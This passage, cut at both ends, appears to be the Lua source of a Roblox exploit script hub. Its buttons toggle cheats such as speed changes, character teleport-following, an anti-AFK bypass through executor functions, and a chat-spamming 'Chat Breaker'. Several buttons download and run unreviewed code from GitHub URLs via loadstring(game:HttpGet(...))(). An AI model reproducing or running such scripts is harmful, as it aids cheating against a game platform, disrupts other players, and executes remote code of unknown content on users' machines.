LeftHip:SetDesiredAngle(-desiredAngle) local tool = getTool() if tool then animStringValueObject = getToolAnim(tool) if animStringValueObject then toolAnim = animStringValueObject.Value -- message recieved, delete StringValue animStringValueObject.Parent = nil toolAnimTime = time + .3 end if time > toolAnimTime then toolAnimTime = 0 toolAnim = "None" end animateTool() else toolAnim = "None" toolAnimTime = 0 end end -- connect events Humanoid.Died:connect(onDied) Humanoid.Running:connect(onRunning) Humanoid.Jumping:connect(onJumping) Humanoid.Climbing:connect(onClimbing) Humanoid.GettingUp:connect(onGettingUp) Humanoid.FreeFalling:connect(onFreeFall) Humanoid.FallingDown:connect(onFallingDown) Humanoid.Seated:connect(onSeated) Humanoid.PlatformStanding:connect(onPlatformStanding) Humanoid.Swimming:connect(onSwimming) -- main program local runService = game:service("RunService"); while Figure.Parent~=nil do local _, time = wait(0.1) move(time) end end }) Main:AddButton({ Title = "FE Inivisible Car", Description = "makes it look like you are driving an invisible car R6", Callback = function() --made by ferretboii#2398/catboy19jan2038 -- Gui to Lua -- Version: 3.2 -- Instances: local Template = Instance.new("ScreenGui") local Frame = Instance.new("Frame") local Frame_2 = Instance.new("Frame") local RUN = Instance.new("TextButton") local ARROW = Instance.new("TextButton") local NAME = Instance.new("TextButton") --Properties: Template.Name = "Template" Template.Parent = game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui") Template.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Frame.Parent = Template Frame.BackgroundColor3 = Color3.fromRGB(79, 79, 79) Frame.BorderSizePixel = 0 Frame.Position = UDim2.new(0.0362374708, 0, 0.482208639, 0) Frame.Size = UDim2.new(0, 174, 0, 28) Frame_2.Parent = Frame Frame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Frame_2.BorderSizePixel = 0 Frame_2.Position = UDim2.new(0, 0, 1, 0) Frame_2.Size = UDim2.new(0, 174, 0, 72) RUN.Name = "RUN" RUN.Parent = Frame_2 RUN.BackgroundColor3 = Color3.fromRGB(0, 255, 0) RUN.BorderColor3 = Color3.fromRGB(255, 255, 0) RUN.BorderSizePixel = 0 RUN.Position = UDim2.new(0.157653749, 0, 0.222330347, 0) RUN.Size = UDim2.new(0, 118, 0, 38) RUN.Font = Enum.Font.PatrickHand RUN.Text = "Car OFF" RUN.TextColor3 = Color3.fromRGB(0, 0, 0) RUN.TextSize = 50.000 ARROW.Name = "ARROW" ARROW.Parent = Frame ARROW.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ARROW.BackgroundTransparency = 1.000 ARROW.BorderSizePixel = 0 ARROW.Position = UDim2.new(0.834664106, 0, 0, 0) ARROW.Size = UDim2.new(0, 28, 0, 28) ARROW.Font = Enum.Font.PatrickHand ARROW.Text = "X" ARROW.TextColor3 = Color3.fromRGB(0, 0, 0) ARROW.TextSize = 30.000 NAME.Name = "NAME" NAME.Parent = Frame NAME.BackgroundColor3 = Color3.fromRGB(255, 255, 255) NAME.BackgroundTransparency = 1.000 NAME.BorderSizePixel = 0 NAME.Position = UDim2.new(0.369146883, 0, 0, 0) NAME.Size = UDim2.new(0, 28, 0, 28) NAME.Font = Enum.Font.PatrickHand NAME.Text = "Car Script" NAME.TextColor3 = Color3.fromRGB(0, 0, 0) NAME.TextSize = 23.000 -- Scripts: local function ICEIM_fake_script() -- RUN.LocalScript local script = Instance.new('LocalScript', RUN) local Toggled = false local Anim, track, hum Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://179224234" script.Parent.MouseButton1Click:Connect(function() if not track or hum ~= game:GetService("Players").LocalPlayer.Character.Humanoid then pcall(game.Destroy, track) track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) hum = game:GetService("Players").LocalPlayer.Character.Humanoid end if Toggled == false then game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 69 script.Parent.Text = "Car ON" track:Play(.1, 1, 1) Toggled = true elseif Toggled == true then track:Stop() script.Parent.Text = "Car OFF" game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 16 Toggled = false end end) end coroutine.wrap(ICEIM_fake_script)() local function XOEAVM_fake_script() -- RUN.RGB_Script local script = Instance.new('LocalScript', RUN) -- Made By Auradomix -- -- Visit My Channel On YT and Twitch = @Auradomix -- PUT "RGB_GUI" ON STARTERGUI -- PUT THIS ON ANY FRAME OR BUTTON OR BOX OR ... -- ONLY ADAPTED FOR GUI, Please Referance To my Other Model For Brick -- Local Script = Client -- Script = Server -- For more fast Server Put them as a Local Scrpit for Gui while wait() do script.Parent.BackgroundColor3 = Color3.new(255/255,0/255,0/255) for i = 0,255,10 do wait() script.Parent.BackgroundColor3 = Color3.new(255/255,i/255,0/255) end for i = 255,0,-10 do wait() script.Parent.BackgroundColor3 = Color3.new(i/255,255/255,0/255) end for i = 0,255,10 do wait() script.Parent.BackgroundColor3 = Color3.new(0/255,255/255,i/255) end for i = 255,0,-10 do wait() script.Parent.BackgroundColor3 = Color3.new(0/255,i/255,255/255) end for i = 0,255,10 do wait() script.Parent.BackgroundColor3 = Color3.new(i/255,0/255,255/255) end for i = 255,0,-10 do wait() script.Parent.BackgroundColor3 = Color3.new(255/255,0/255,i/255) end end end coroutine.wrap(XOEAVM_fake_script)() local function WMHNT_fake_script() -- Frame.RGB_Script local script = Instance.new('LocalScript', Frame) -- Made By Auradomix -- -- Visit My Channel On YT and Twitch = @Auradomix -- PUT "RGB_GUI" ON STARTERGUI -- PUT THIS ON ANY FRAME OR BUTTON OR BOX OR ... -- ONLY ADAPTED FOR GUI, Please Referance To my Other Model For Brick -- Local Script = Client -- Script = Server -- For more fast Server Put them as a Local Scrpit for Gui while wait() do script.Parent.BackgroundColor3 = Color3.new(255/255,0/255,0/255) for i = 0,255,10 do wait() script.Parent.BackgroundColor3 = Color3.new(255/255,i/255,0/255) end for i = 255,0,-10 do wait() script.Parent.BackgroundColor3 = Color3.new(i/255,255/255,0/255) end for i = 0,255,10 do wait() script.Parent.BackgroundColor3 = Color3.new(0/255,255/255,i/255) end for i = 255,0,-10 do wait() script.Parent.BackgroundColor3 = Color3.new(0/255,i/255,255/255) end for i = 0,255,10 do wait() script.Parent.BackgroundColor3 = Color3.new(i/255,0/255,255/255) end for i = 255,0,-10 do wait() script.Parent.BackgroundColor3 = Color3.new(255/255,0/255,i/255) end end end coroutine.wrap(WMHNT_fake_script)() local function XDCFV_fake_script() -- Frame.Smooth GUI Dragging local script = Instance.new('LocalScript', Frame) local UserInputService = game:GetService("UserInputService") local runService = (game:GetService("RunService")); local gui = script.Parent local dragging local dragInput local dragStart local startPos function Lerp(a, b, m) return a + (b - a) * m end; local lastMousePos local lastGoalPos local DRAG_SPEED = (8); -- // The speed of the UI darg. function Update(dt) if not (startPos) then return end; if not (dragging) and (lastGoalPos) then gui.Position = UDim2.new(startPos.X.Scale, Lerp(gui.Position.X.Offset, lastGoalPos.X.Offset, dt * DRAG_SPEED), startPos.Y.Scale, Lerp(gui.Position.Y.Offset, lastGoalPos.Y.Offset, dt * DRAG_SPEED)) return end; local delta = (lastMousePos - UserInputService:GetMouseLocation()) local xGoal = (startPos.X.Offset - delta.X); local yGoal = (startPos.Y.Offset - delta.Y); lastGoalPos = UDim2.new(startPos.X.Scale, xGoal, startPos.Y.Scale, yGoal) gui.Position = UDim2.new(startPos.X.Scale, Lerp(gui.Position.X.Offset, xGoal, dt * DRAG_SPEED), startPos.Y.Scale, Lerp(gui.Position.Y.Offset, yGoal, dt * DRAG_SPEED)) end; gui.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = gui.Position lastMousePos = UserInputService:GetMouseLocation() input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) gui.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) runService.Heartbeat:Connect(Update) end coroutine.wrap(XDCFV_fake_script)() local function MAOTEA_fake_script() -- ARROW.LocalScript local script = Instance.new('LocalScript', ARROW) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Frame.Visible = not script.Parent.Parent.Frame.Visible end) end coroutine.wrap(MAOTEA_fake_script)() local function WZVKWAF_fake_script() -- NAME.LocalScript local script = Instance.new('LocalScript', NAME) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Frame.Visible = not script.Parent.Parent.Frame.Visible end) end coroutine.wrap(WZVKWAF_fake_script)() end }) Main:AddButton({ Title = "FE Tool rotate", Description = "to make everyone see it once your done rotating unequip then equip the tool again", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/fe%20toolrotate.txt"))() end }) Main:AddButton({ Title = "FE Chat Art", Description = "type .texthere for the chat art also only works in some games and will prob get rate limited", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/chatart.lua"))() end }) Main:AddButton({ Title = "FE Chat Breaker", Description = "spams chat and seems to break it", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/chatbreaker.lua"))() end }) Main:AddButton({ Title = "FE Bot", Description = "be a bot for everyone to use", Callback = function() --credits: Snip#3132 -- Editted By Creo ^ Credits to creator above --Commands: move forward, -move backward, -move leftward, -move rightward, -shiftlock on, -shiftlock off, -stop moving, -dance, -dance1, -dance2, -dance3, -wave, -point, -laugh, -jump, -joke local chat = function(MSG) -- creo thing game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(MSG, "All") end chat("You can now control me!! Type commands below to do so.") chat("Commands: -move forward, -move backward, -move leftward, -move rightward, -jump, -joke") chat("-shiftlock on, -shiftlock off, -stop moving, -dance, -dance1, -dance2, -dance3") local keys = { ["a"] = 0x41, ["b"] = 0x42, ["c"] = 0x43, ["d"] = 0x44, ["e"] = 0x45, ["f"] = 0x46, ["g"] = 0x47, ["h"] = 0x48, ["i"] = 0x49, ["j"] = 0x4A, ["k"] = 0x4B, ["l"] = 0x4C, ["m"] = 0x4D, ["n"] = 0x4E, ["o"] = 0x4F, ["p"] = 0x50, ["q"] = 0x51, ["r"] = 0x52, ["s"] = 0x53, ["t"] = 0x54, ["u"] = 0x55, ["v"] = 0x56, ["w"] = 0x57, ["x"] = 0x58, ["y"] = 0x59, ["z"] = 0x5A, ["0"] = 0x30, ["1"] = 0x31, ["2"] = 0x32, ["3"] = 0x33, ["4"] = 0x34, ["5"] = 0x35, ["6"] = 0x36, ["7"] = 0x37, ["8"] = 0x38, ["9"] = 0x39, ["+"] = 0xBB, ["-"] = 0xBD, [","] = 0xBC, ["."] = 0xBE, ["quote"] = 0xDE, ["esc"] = 0x1B, ["tab"] = 0x09, ["caps"] = 0x14, ["lshift"] = 0xA0, ["rshift"] = 0xA1, ["ctrl"] = 0x11, ["lctrl"] = 0xA2, ["rctrl"] = 0xA3, ["lwin"] = 0x5B, ["rwin"] = 0x5C, ["alt"] = 0x12, ["space"] = 0x20, ["enter"] = 0x0D, ["backspace"] = 0x08, ["sshot"] = 0x2C, ["scrolllock"] = 0x91, ["pause"] = 0x13, ["insert"] = 0x2D, ["home"] = 0x24, ["pgup"] = 0x21, ["del"] = 0x2E, ["end"] = 0x23, ["pgdn"] = 0x22, ["up_a"] = 0x26, ["down_a"] = 0x28, ["left_a"] = 0x25, ["right_a"] = 0x27, ["numlock"] = 0x90, ["sleep"] = 0x5F, ["n_0"] = 0x60, ["n_1"] = 0x61, ["n_2"] = 0x62, ["n_3"] = 0x63, ["n_4"] = 0x64, ["n_5"] = 0x65, ["n_6"] = 0x66, ["n_7"] = 0x67, ["n_8"] = 0x68, ["n_9"] = 0x69, ["v_mute"] = 0xAD, ["v_up"] = 0xAF, ["v_down"] = 0xAE, ["next_t"] = 0xB0, ["prev_t"] = 0xB1, ["stop_t"] = 0xB2, ["pause_t"] = 0xB3, ["f1"] = 0x70, ["f2"] = 0x71, ["f3"] = 0x72, ["f4"] = 0x73, ["f5"] = 0x74, ["f6"] = 0x75, ["f7"] = 0x76, ["f8"] = 0x77, ["f9"] = 0x78, ["f10"] = 0x79, ["f11"] = 0x7A, ["f12"] = 0x7B, } function hold(mousebutton) if mousebutton == "left" then mouse1down() elseif mousebutton == "right" then mouse2down() end end function release(mousebutton) if mousebutton == "left" then mouse1up() elseif mousebutton == "right" then mouse2up() end end function click(mousebutton) if mousebutton == "left" then mouse1click() elseif mousebutton == "right" then mouse2click() end end function move(x,y) mousemoveabs(x,y) end function scroll(p) mousescroll(p) end function loopmove(x,y) if canmove2 ~= false then canmove1 = false spawn(function() local l l = game:GetService("RunService").Heartbeat:Connect(function() if canmove1 == true then l:Disconnect() end wait() move(x,y) end) end) end end function breakmove() canmove1 = false end local mouse = game:GetService("Players").LocalPlayer:GetMouse() canmove2 = true function togglemove() if canmove1 ~= false then if canmove2 == false then canmove2 = true elseif canmove2 == true then canmove2 = false mx = mouse.X my = mouse.Y spawn(function() local l l = game:GetService("RunService").Heartbeat:Connect(function() if canmove2 == true then l:Disconnect() end wait() move(mx,my) end) end) end end end function type(string) for _,char in pairs(string:split("")) do wait(0.01) if char == " " then keypress(keys["space"]) else if char:upper() == char and (char ~= "," and char ~= "." and char ~= "-" and char ~= "+" and char ~= "'" and char ~= '"' and char ~= "<" and char ~= ">" and char ~= "_" and char ~= "=") then keypress(keys["lshift"]) keypress(keys[char:lower()]) keyrelease(keys["lshift"]) else if char == "'" then keyrelease(keys["caps"]) keyrelease(keys["lshift"]) keypress(keys["quote"]) elseif char == '"' then keyrelease(keys["caps"]) keypress(keys["lshift"]) keypress(keys["quote"]) keyrelease(keys["lshift"]) elseif char == "<" then keyrelease(keys["caps"]) keypress(keys["lshift"]) keypress(keys[","]) keyrelease(keys["lshift"]) elseif char == ">" then keyrelease(keys["caps"]) keypress(keys["lshift"]) keypress(keys["."]) keyrelease(keys["lshift"]) elseif char == "_" then keyrelease(keys["caps"]) keypress(keys["lshift"]) keypress(keys["-"]) keyrelease(keys["lshift"]) elseif char == "=" then keyrelease(keys["caps"]) keypress(keys["lshift"]) keypress(keys["+"]) keyrelease(keys["lshift"]) else keyrelease(keys["caps"]) keyrelease(keys["lshift"]) keypress(keys[char]) end end end end end local chatEvents = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents") local messageDoneFiltering = chatEvents:WaitForChild("OnMessageDoneFiltering") messageDoneFiltering.OnClientEvent:Connect(function(message) local msg = message.Message or "" print(msg) if msg:lower():sub(1,13) == "-move forward" then keyrelease(keys["s"]) keypress(keys["w"]) end if msg:lower():sub(1,14) == "-move backward" then keyrelease(keys["w"]) keypress(keys["s"]) end if msg:lower():sub(1,14) == "-move leftward" then keyrelease(keys["d"]) keypress(keys["a"]) end if msg:lower():sub(1,15) == "-move rightward" then keyrelease(keys["a"]) keypress(keys["d"]) end if msg:lower():sub(1,13) == "-shiftlock on" then keypress(keys["lshift"]) keyrelease(keys["lshift"]) end if msg:lower():sub(1,14) == "-shiftlock off" then keypress(keys["lshift"]) keyrelease(keys["lshift"]) end if msg:lower():sub(1,12) == "-stop moving" then keyrelease(keys["w"]) keyrelease(keys["s"]) keyrelease(keys["a"]) keyrelease(keys["d"]) end if msg:lower():sub(1,5) == "-wave" then game:GetService("Players"):Chat("/e wave") end if msg:lower():sub(1,6) == "-point" then game:GetService("Players"):Chat("/e point") end if msg:lower():sub(1,6) == "-laugh" then game:GetService("Players"):Chat("/e laugh") end if msg:lower():sub(1,6) == "-dance" then game:GetService("Players"):Chat("/e dance") end if msg:lower():sub(1,7) == "-dance1" then game:GetService("Players"):Chat("/e dance1") end if msg:lower():sub(1,7) == "-dance2" then game:GetService("Players"):Chat("/e dance2") end if msg:lower():sub(1,7) == "-dance3" then game:GetService("Players"):Chat("/e dance3") end if msg:lower():sub(1,12) == "-rotate left" then keyrelease(keys["right_a"]) keypress(keys["left_a"]) end if msg:lower():sub(1,13) == "-rotate right" then keyrelease(keys["left_a"]) keypress(keys["right_a"]) end if msg:lower():sub(1,12) == "-rotate stop" then keyrelease(keys["right_a"]) keyrelease(keys["left_a"]) end if msg:lower():sub(1,5) == "-jump" then keypress(keys["space"]) wait(0.1) keyrelease(keys["space"]) end end) end }) Main:AddButton({ Title = "FE Bot 2", Description = "be a bot for everyone to use", Callback = function() local follow = ".follow" getgenv().Following = nil local unfollow = ".unfollow" local die,reset = ".die", ".reset" local cmds = ".cmds" local plrs = game:GetService("Players") local plr = game:GetService("Players").LocalPlayer game:GetService("Players").PlayerAdded:Connect(function(player) game.StarterGui:SetCore("SendNotification", { Title = "Player Joined"; Text = player.Name .. " Joined"; Icon = ""; Duration = 5; Callback = NotificationBindable; }) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Player Joined " .. player.Name ,"All") end) game:GetService("Players").PlayerRemoving:Connect(function(player) game.StarterGui:SetCore("SendNotification", { Title = "Player Left"; Text = player.Name .. " Left"; Icon = ""; Duration = 5; Callback = NotificationBindable; }) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Player Left " .. player.Name ,"All") end) GetArgs = function(Args) return Args:split(" ") end FindPlayer = function(h,h2) if string.lower(h) == "me" then return plr else h = h:gsub("%s+", "") for m, n in pairs(game:GetService("Players"):GetPlayers()) do if n.Name:lower():match("^" .. h:lower()) or n.DisplayName:lower():match("^" .. h:lower()) then return n end end end return nil end --[[ local Args = GetArgs(message) local r = FindPlayer(Args[2]) if r then print(r) else print('nah') end ]] followingplr = nil for i,v in pairs(plrs:GetPlayers()) do v.Chatted:Connect(function(message) if string.find(message, follow) then local Args = GetArgs(message) local r = FindPlayer(Args[2]) if r then followingplr = r else game.StarterGui:SetCore("SendNotification", { Title = "Could Not Find Player!"; Text = ""; Icon = ""; Duration = 5; Callback = NotificationBindable; }) return end getgenv().Following = true game.StarterGui:SetCore("SendNotification", { Title = "Now Following"; Text = followingplr.Name; Icon = ""; Duration = 5; Callback = NotificationBindable; }) task.spawn(function() while true do wait() if not getgenv().Following then break end plr.Character:WaitForChild("HumanoidRootPart").CFrame = followingplr.Character:WaitForChild("HumanoidRootPart").CFrame end end) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("now following " .. followingplr.Name,"All") end if string.sub(string.lower(unfollow), 0, #message) == string.lower(message) or string.find(message,unfollow) then if getgenv().Following then game.StarterGui:SetCore("SendNotification", { Title = "No Longer Following"; Text = followingplr.Name; Icon = ""; Duration = 5; Callback = NotificationBindable; }) getgenv().Following = false game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("no longer following " .. followingplr.Name,"All") else game.StarterGui:SetCore("SendNotification", { Title = "Not Following Anyone"; Text = ""; Icon = ""; Duration = 5; Callback = NotificationBindable; }) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("not following anyone","All") end end if string.sub(string.lower(reset), 0, #message) == string.lower(message) or string.sub(string.lower(die), 0, #message) == string.lower(message) then plr.Character.Humanoid.Health = 0 game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("now dying","All") end if string.find(message,cmds) then game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(".follow [plr] .unf .die .reset","All") end end) end local GC = getconnections or get_signal_cons if GC then for i,v in pairs(GC(game:GetService("Players").LocalPlayer.Idled)) do if v["Disable"] then v["Disable"](v) elseif v["Disconnect"] then v["Disconnect"](v) end end else game:GetService("Players").LocalPlayer.Idled:Connect(function() local VirtualUser = game:GetService("VirtualUser") VirtualUser:CaptureController() VirtualUser:ClickButton2(Vector2.new()) end) end ANTIAFK = game:GetService("Players").LocalPlayer.Idled:connect(function() game:FindService("VirtualUser"):Button2Down(Vector2.new(0,0),game:GetService("Workspace").CurrentCamera.CFrame) task.wait(1) game:FindService("VirtualUser"):Button2Up(Vector2.new(0,0),game:GetService("Workspace").CurrentCamera.CFrame) end) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Hi im a script bot basically just type .cmds to see all the commands!","All") end }) Main:AddButton({ Title = "FE Reverse time", Description = "reverse player position by 60 seconds as long as your holding E", Callback = function() --Credits --https://v3rmillion.net/showthread.php?tid=1202396 local key = "E" --key to intiate the flashback. see https://create.roblox.com/docs/reference/engine/enums/KeyCode for an exhaustive list local flashbacklength = 60 --how long the flashback should be stored in approx seconds local flashbackspeed = 1 --how many frames to skip during flashback (set to 0 to disable) local name = game:GetService("RbxAnalyticsService"):GetSessionId() --unique id that games cannot access but does not change on subsequent executions (used for the name of the binded function) local frames,uis,LP,RS = {},game:GetService("UserInputService"),game:GetService("Players").LocalPlayer,game:GetService("RunService") --set some vars pcall(RS.UnbindFromRenderStep,RS,name) --unbind the function if previously binded local function getchar() return LP.Character or LP.CharacterAdded:Wait() end function gethrp(c) --gethrp ripped from my env script and stripped of arguments return c:FindFirstChild("HumanoidRootPart") or c.RootPart or c.PrimaryPart or c:FindFirstChild("Torso") or c:FindFirstChild("UpperTorso") or c:FindFirstChildWhichIsA("BasePart") end local flashback = {lastinput=false,canrevert=true} function flashback:Advance(char,hrp,hum,allowinput) if #frames>flashbacklength*60 then --make sure we don't have too much history table.remove(frames,1) end if allowinput and not self.canrevert then self.canrevert = true end if self.lastinput then --make sure platformstand goes back to normal hum.PlatformStand = false self.lastinput = false end table.insert(frames,{ hrp.CFrame, hrp.Velocity, hum:GetState(), hum.PlatformStand, char:FindFirstChildOfClass("Tool") }) end function flashback:Revert(char,hrp,hum) local num = #frames if num==0 or not self.canrevert then --add to history and return if no history is present self.canrevert = false self:Advance(char,hrp,hum) return end for i=1,flashbackspeed do --skip frames (if enabled) table.remove(frames,num) num=num-1 end self.lastinput = true local lastframe = frames[num] table.remove(frames,num) hrp.CFrame = lastframe[1] hrp.Velocity = -lastframe[2] hum:ChangeState(lastframe[3]) hum.PlatformStand = lastframe[4] --platformstand to make flying look normal again local currenttool = char:FindFirstChildOfClass("Tool") if lastframe[5] then --equip/unequip tools if not currenttool then hum:EquipTool(lastframe[5]) end else hum:UnequipTools() end end local function step() --function that runs every frame local char = getchar() local hrp = gethrp(char) local hum = char:FindFirstChildWhichIsA("Humanoid") if uis:IsKeyDown(Enum.KeyCode[key]) then --begin flashback flashback:Revert(char,hrp,hum) else flashback:Advance(char,hrp,hum,true) end end RS:BindToRenderStep(name,1,step) --finally, bind our function end }) Main:AddButton({ Title = "FE Reverse time V2", Description = "reverse player position", Callback = function() local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))() Library.DefaultColor = Color3.fromRGB(0,255,0) Library:Notification({ Text = "Provided By Envixity Scripts on YouTube", Duration = 3 }) wait (2) local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))() Library.DefaultColor = Color3.fromRGB(0,255,0) Library:Notification({ Text = "Envixity Scripts On Top! Script Executed", Duration = 3 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe./main/L"))() end }) Main:AddButton({ Title = "FE CTTV Camera", Description = "set cameras", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/CCTV%20Camera'))() end }) Main:AddButton({ Title = "FE Parkour/Ninja", Description = "just jump on walls and shi u can wall run very cool made by Emetimex", Callback = function() --Emetimex plr = game.Players.LocalPlayer local colormansup = 255 local sliding = false if plr:WaitForChild("PlayerScripts"):FindFirstChild("Player Stuff") then plr:WaitForChild("PlayerScripts"):FindFirstChild("Player Stuff"):Destroy() end local camerakill = false mobile = false local downeddel= false local walkingmode = false char = plr.Character if char:FindFirstChild("ClientInputHandler") then char:FindFirstChild("ClientInputHandler"):Destroy() end if plr:FindFirstChild("Status") then plr:FindFirstChild("Status"):Destroy() end if game.Workspace:FindFirstChild("Remote") then if game.Workspace:FindFirstChild("Remote"):FindFirstChild("TeamEvent") then Workspace.Remote.TeamEvent:FireServer("Medium stone grey") end end local downed = false local combatmusic = Instance.new("Sound",char) combatmusic.Volume = 0 combatmusic.PlaybackSpeed = 1 combatmusic.Looped = true local ambience = Instance.new("Sound",char) ambience.Volume = 0.5 ambience.PlaybackSpeed = 1 ambience.Looped = true local winder = Instance.new("Sound",char) winder.SoundId = "rbxassetid://337604103" winder.Volume = 0 winder.PlaybackSpeed = 1 winder.Looped = true winder:Play() local windercloth = Instance.new("Sound",char) windercloth.SoundId = "rbxassetid://195879271" windercloth.Volume = 0 windercloth.PlaybackSpeed = 1 windercloth.Looped = true windercloth:Play() local explorationmusic = Instance.new("Sound",char) explorationmusic.Volume = 0 explorationmusic.PlaybackSpeed = 1 explorationmusic.Looped = true local rannum = math.random(1,11) if rannum == 1 then combatmusic.SoundId = "rbxassetid://4842424057" explorationmusic.SoundId = "rbxassetid://6092889291" ambience.SoundId = "rbxassetid://4842514147" ambience:Play() explorationmusic:Play() combatmusic:Play() end if rannum == 2 then combatmusic.SoundId = "rbxassetid://5167357719" explorationmusic.SoundId = "rbxassetid://5136807172" ambience.SoundId = "rbxassetid://5136807172" ambience:Play() explorationmusic:Play() combatmusic:Play() end if rannum == 3 then combatmusic.SoundId = "rbxassetid://5355007603" explorationmusic.SoundId = "rbxassetid://5192956194" ambience.SoundId = "rbxassetid://5192956194" ambience:Play() explorationmusic:Play() combatmusic:Play() end if rannum == 4 then combatmusic.SoundId = "rbxassetid://1591306349" explorationmusic.SoundId = "rbxassetid://5246801658" ambience.SoundId = "rbxassetid://5167384455" ambience:Play() explorationmusic:Play() combatmusic:Play() end if rannum == 5 then combatmusic.SoundId = "rbxassetid://5356631522" explorationmusic.SoundId = "rbxassetid://4502246491" ambience.SoundId = "rbxassetid://4502246491" ambience:Play() explorationmusic:Play() combatmusic:Play() end if rannum == 6 then combatmusic.SoundId = "rbxassetid://5183689299" explorationmusic.SoundId = "rbxassetid://538850338" ambience.SoundId = "rbxassetid://538850338" ambience:Play() explorationmusic:Play() combatmusic:Play() end if rannum == 7 then combatmusic.SoundId = "rbxassetid://5258344366" explorationmusic.SoundId = "rbxassetid://5079119831" ambience.SoundId = "rbxassetid://5079119831" ambience:Play() explorationmusic:Play() combatmusic:Play() end if rannum == 8 then combatmusic.SoundId = "rbxassetid://5995057631" explorationmusic.SoundId = "rbxassetid://477207390" ambience.SoundId = "rbxassetid://477207390" ambience:Play() explorationmusic:Play() combatmusic:Play() end if rannum == 9 then combatmusic.SoundId = "rbxassetid://4841933336" explorationmusic.SoundId = "rbxassetid://5114418235" ambience.SoundId = "rbxassetid://5114418235" ambience:Play() explorationmusic:Play() combatmusic:Play() end if rannum == 10 then combatmusic.SoundId = "rbxassetid://5132571388" explorationmusic.SoundId = "rbxassetid://5995060646" ambience.SoundId = "rbxassetid://5995060646" ambience:Play() explorationmusic:Play() combatmusic:Play() end if rannum == 11 then combatmusic.SoundId = "rbxassetid://5433879104" explorationmusic.SoundId = "rbxassetid://4692224051" ambience.SoundId = "rbxassetid://4692224051" ambience:Play() explorationmusic:Play() combatmusic:Play() end local tricksinarow = 0 local tricktime = 0 local timestanding = 0 local combattime = 0 root = char:WaitForChild("HumanoidRootPart") local slidingsound = Instance.new("Sound",root) slidingsound.SoundId = "rbxassetid://4086205029" slidingsound.PlaybackSpeed = 1.25 slidingsound.Looped = true slidingsound.Volume = 0.75 local wallrunningsound = Instance.new("Sound",root) wallrunningsound.SoundId = "rbxassetid://401049343" wallrunningsound.PlaybackSpeed = 1 wallrunningsound.Looped = true wallrunningsound.Volume = 0.75 function randomclothrollsound(truth) coroutine.resume(coroutine.create(function() if truth ~= nil then local s = Instance.new("Sound",root) s.Volume = 0.8 +math.random(1,6)*0.05 s.PlaybackSpeed = 0.8 +math.random(1,6)*0.05 local rannum = math.random(1,5) if rannum == 1 then s.SoundId = "rbxassetid://4086203738" elseif rannum == 2 then s.SoundId = "rbxassetid://4086203442" elseif rannum == 3 then s.SoundId = "rbxassetid://4086203142" elseif rannum == 4 then s.SoundId = "rbxassetid://4086203973" else s.SoundId = "rbxassetid://4307029050" end s:Play() game:GetService("Debris"):AddItem(s,4) else local s = Instance.new("Sound",root) s.Volume = 0.25 +math.random(1,6)*0.05 s.PlaybackSpeed = 0.8 +math.random(1,6)*0.05 local rannum = math.random(1,7) if rannum == 1 then s.SoundId = "rbxassetid://3929467229" elseif rannum == 2 then s.SoundId = "rbxassetid://3929467449" elseif rannum == 3 then s.SoundId = "rbxassetid://3929467655" elseif rannum == 4 then s.SoundId = "rbxassetid://3929467888" elseif rannum == 5 then s.SoundId = "rbxassetid://4458760046" elseif rannum == 6 then s.SoundId = "rbxassetid://4458760518" else s.SoundId = "rbxassetid://4458759938" end s:Play() game:GetService("Debris"):AddItem(s,4) end end)) end local rollingsound = Instance.new("Sound",root) rollingsound.SoundId = "rbxassetid://2985734522" rollingsound.PlaybackSpeed = 1 rollingsound.Volume = 0.75 local bodymovesound = Instance.new("Sound",root) bodymovesound.SoundId = "rbxassetid://152206206" bodymovesound.PlaybackSpeed = 0.945 bodymovesound.Volume = 2.35 local downedsound = Instance.new("Sound",root) downedsound.SoundId = "rbxassetid://178088040" downedsound.PlaybackSpeed = 1 downedsound.Volume = 3 local jumplandsoundthingy = Instance.new("Sound",root) jumplandsoundthingy.SoundId = "rbxassetid://6079431954" jumplandsoundthingy.PlaybackSpeed = 0.785 jumplandsoundthingy.Volume = 2 hum = char:WaitForChild("Humanoid") hum.JumpPower = 50 local colorparkourkill = 